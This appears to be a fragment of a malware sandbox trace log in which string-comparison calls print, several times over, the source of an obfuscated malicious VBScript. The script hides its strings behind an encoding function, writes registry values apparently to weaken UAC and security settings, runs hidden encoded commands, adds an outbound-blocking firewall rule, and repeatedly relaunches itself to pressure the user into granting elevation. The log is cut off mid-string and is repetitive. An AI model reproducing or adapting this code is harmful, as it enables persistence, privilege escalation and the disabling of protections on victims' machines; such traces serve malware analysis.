str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0226.371] wcsncmp (_String1="BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 53 [0226.371] wcsncmp (_String1="FAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0226.371] wcsncmp (_String1="AEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 52 [0226.371] wcsncmp (_String1="EMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 